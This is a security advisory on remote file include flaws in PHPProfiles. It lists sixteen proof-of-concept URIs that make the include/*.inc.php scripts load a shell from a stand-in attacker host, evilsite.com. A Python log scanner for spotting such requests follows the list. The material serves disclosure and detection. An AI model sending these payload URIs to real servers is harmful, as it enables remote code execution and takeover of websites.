
PHPProfiles Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php
http://www.example.com/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php
http://www.example.com/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php?
http://www.example.com/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?
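One way to find requests of the shape listed above in web server logs, added here as an example and not part of the original advisory: it flags requests to `include/*.inc.php` whose `incpath` or `menu` parameter carries a URL, including URL-encoded and double-encoded values. The log lines, the `/profiles/` install path and the host `remote.example` are constructed sample values, and a combined-format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters named in the advisory's proof-of-concept URIs.
INCLUDE_PARAMS = {"incpath", "menu"}
# Value begins with a URL scheme (http:, ftp:, php:, data: ...) or "//".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.IGNORECASE)
# Scripts affected according to the URIs: anything under include/ ending .inc.php
INCLUDE_SCRIPT = re.compile(r"/include/[^/]+\.inc\.php$", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(param, value)] for include parameters that carry a URL."""
    parts = urlsplit(target)
    if not INCLUDE_SCRIPT.search(parts.path):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding.
        decoded = unquote(value)
        if name.lower() in INCLUDE_PARAMS and REMOTE_VALUE.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return [(line_number, param, value)] for every flagged log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((number, name, value))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /profiles/include/body.inc.php?menu=home HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2009:10:00:05 +0000] "GET /profiles/include/body.inc.php?menu=http://remote.example/x.txt HTTP/1.1" 200 90',
    '192.0.2.44 - - [01/Jan/2009:10:00:06 +0000] "GET /profiles/include/notify.inc.php?action=sendit&incpath=http%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.1" 200 90',
    '192.0.2.10 - - [01/Jan/2009:10:00:09 +0000] "GET /profiles/index.php?page=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name} carries a URL: {value}")
```

Legitimate requests should never pass a URL in these parameters, so any hit is worth reviewing together with the server's outbound connections at the same timestamp.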







 

Copyright 2009, SecurityFocus